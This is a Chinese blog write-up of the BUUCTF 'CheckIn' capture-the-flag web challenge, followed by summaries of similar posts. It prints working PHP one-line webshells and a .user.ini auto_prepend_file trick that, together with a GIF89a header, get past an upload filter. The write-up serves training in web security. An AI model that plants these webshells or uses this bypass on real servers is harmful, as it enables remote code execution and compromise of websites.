buuctf WEB checkin1

最新推荐文章于 2024-06-11 18:30:48 发布
最新推荐文章于 2024-06-11 18:30:48 发布
阅读量271 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120526932
版权

这题考的文件上传
经典一句话先试试,回显文件格式不对,把php文件后缀改成jpg格式
第二次回显,显示文件中包含<?,那就把一句话,改成如下形式

<script language='php'>eval($_POST['niaho']);</script>

成功绕过<?匹配,回显不是图片格式,图片头绕过GIF89a
成功上传,下面就是如何上传php文件,或者执行php代码了
经过检测,对于文件类型进行了严格的过滤,改后缀肯定不行
经过检测,可以上传.user.ini文件(指纹检测下来是lnmp环境),相当于apache里面的.htaccess文件,里面有一个auto_prepend_file属性
相当于在上传目录中所有的php文件在运行时都会提前以代码的格式添加指定文件中的内容
那么,就可以实现php代码运行了
上传一句话也行,或者上传两次,第一次确定flag文件位置,第二次读取文件也行
以一句话为例,新建一个.user.ini文件

GIF89a
auto_prepend_file=shell.txt

新建shell.txt,上传,内容:

GIF89a
<script language='php'>assert($_POST['nihao']);</script> //assert执行相对比eval轻松,eval会检测代码格式,所以在eval失效的情况下,可以考虑用assert代替

然后访问上传路径中的index.php,即可拿到flag
参考视频链接:https://www.bilibili.com/video/BV1LQ4y167b9/

显哥无敌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1591
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
checkin:会议签到 Web 应用程序
06-01
会议签到 Web 应用程序刷您的 ID 或输入您的信息以在任何会议上签到。依赖关系目前正在运行 , MySQL数据库Google Drive .NET SDK、Google Sheets .NET SDK、Google OAuth .NET SDK(用于 IEEECheckin.ASPDocs)版本...
buuctf-web-[SUCTF 2019]CheckIn1
mlws1900的博客
08-11 427
类似的思路就是index.php把1.jpg进行文件包含,1.jpg里面的内容就以php代码执行,于是getshell。,对GIF89a进行检测(exif_imagetype)这题目环境好像有问题一样,做着做着就自动刷新了上传的马,还好截图快。上传文件,上传一个空的jpg文件,发现not image。exif_imagetype -- 判断一个图像的类型。然后先上传user.ini然后上传jpg文件。文件上传漏洞之user.ini留后门。做一个.user.ini文件。进入根目录找到flag即可。
BUUCTF---web---[SUCTF 2019]CheckIn
最新发布
2201_75556700的博客
06-11 913
7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显。.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)2、上传正常的jpg文件,提示内容不能有<?4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传。5、必须要是图片类型,将一句话木马,添加图片头后再上传。6、上传成功了,但是需要让图片马当成php代码来执行。10、使用系统函数,查看文件根目录,发现flag文件。9、测试,发现文件上传成功。
BUUCTF-CheckIn
m0_47571887的博客
11-09 790
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
BUUCTF_web_CheckIn
silence1_的博客
08-31 2181
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1531
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
checkin
03-18
【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,同时对深层链接的概念进行实践。深层...
checkin:SSM做的签到系统Web实现
04-29
SSM框架 实现简单的签到系统 sql 设计 create table user( user_id INT NOT NULL AUTO_INCREMENT, user_name VARCHAR(40) NOT NULL, user_email VARCHAR(100), user_password VARCHAR(100) NOT NULL, ...
checkin1:第5组TCSS 360
05-14
【标题】"checkin1:第5组TCSS 360"指的是一个项目或作业提交,可能是在学习或工作中,由一个名为“第5组”的团队完成的。TCSS 360可能是课程名或者项目代号,代表全面的系统安全或软件开发流程。团队成员包括Hari G ...
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2225
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF闯关日记--[SUCTF 2019]CheckIn1()
qq_64201116的博客
05-18 272
这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势 进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试 1. 发现.htaccess文件传不了 2. 含有 <? 的文件传不了 首先先解决第一个问题: 一.如果.htaccess文件传不了以我现有的知识只有两个方法: 1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀 2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了 但是现有
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1456
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
BUUCTF [SUCTF 2019]CheckIn 1
weixin_45642610的博客
01-17 724
BUUCTF [SUCTF 2019]CheckIn 1 文件包含,一句话木马上传。 直接上传一句话木马<?php eval($_POST['a']);?> 非法后缀 那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp 都试试,都不行。 这时候可以用图片上传。 在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入 GIF89a <script language=php>eval($_POST['a']);&l
BUUCTF WEB [SUCTF 2019]CheckIn
Y1da的博客
04-17 306
BUUCTF WEB [SUCTF 2019]CheckIn .user.ini文件 PHP 支持基于每个目录的 INI 文件配置。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义
BUUCTF web CheckIn (upload新姿势.user.ini)
H4ppyD0g的博客
02-24 692
一看是文件上传题目,很自信,之前做过upload专题,基本上就那么几种考点。 上传一个1.php试水,果然不行。 那就看看将小马写在1.jpg文本文件中,用burp改包行不行,结果被检查出来了。 嗯…应该是会检测文件属性吧,直接把小马写进txt然后该后缀名是不行了。 知识盲区 exif_imagetype:not image! ,是用了 exif_imagetype() 函数对文件格式进行了...
BUUCTF [GXYCTF2019] CheckIn 1
YueXuan_521的博客
07-03 695
BUUCTF [GXYCTF2019] CheckIn 1
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1150
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值